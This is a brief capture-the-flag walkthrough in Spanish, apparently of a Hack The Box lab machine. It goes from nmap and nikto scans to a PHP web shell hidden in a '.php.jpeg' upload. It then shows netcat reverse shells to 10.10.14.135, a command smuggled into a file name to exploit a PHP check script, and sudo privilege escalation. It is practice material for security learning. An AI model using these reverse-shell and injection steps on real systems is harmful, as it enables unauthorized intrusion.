nmap -A -p- -oA output 10.129.166.190 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA networked 10.129.166.190

nmap -sU -O -p- -oA networked-udp 10.129.166.190

nikto -h 10.166.190:80

Pasted image 20220122123851.png

Pasted image 20220122124144.png

nmap --script http-enum -p80 10.129.166.190 -oN webScan

Pasted image 20220122123808.png

http://10.129.166.190/backup

Pasted image 20220122124350.png

7z l backup.tar

Pasted image 20220122124528.png

http://10.129.166.190/upload.php

Pasted image 20220122124641.png

Subimos un jpeg y lo vemos en http://10.129.166.190/photos.php

Pasted image 20220122125014.png

mv index.jpeg index.php.jpeg

En el archivo index.php.jpeg

Metemos codigo php

Pasted image 20220122125307.png

http://10.129.166.190/uploads/index.php.jpeg?cmd=ls -al

Pasted image 20220122125632.png

nc -lvnp 443

http://10.129.166.190/uploads/index.php.jpeg?cmd=nc -e /bin/bash 10.10.14.135 443

Pasted image 20220122125952.png

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

cat check_attack.php

Pasted image 20220122154746.png

touch 'nc -c bash 10.10.14.135 443'

nc -lvnp 443

Pasted image 20220122155202.png

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

sudo -l

ls -l /usr/local/sbin/changename.sh

Pasted image 20220122160643.png

https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

sudo /usr/sbin/changename.sh

test bash

Pasted image 20220122161140.png

boxes

copyright©2022 Cu3rv0x all rights reserved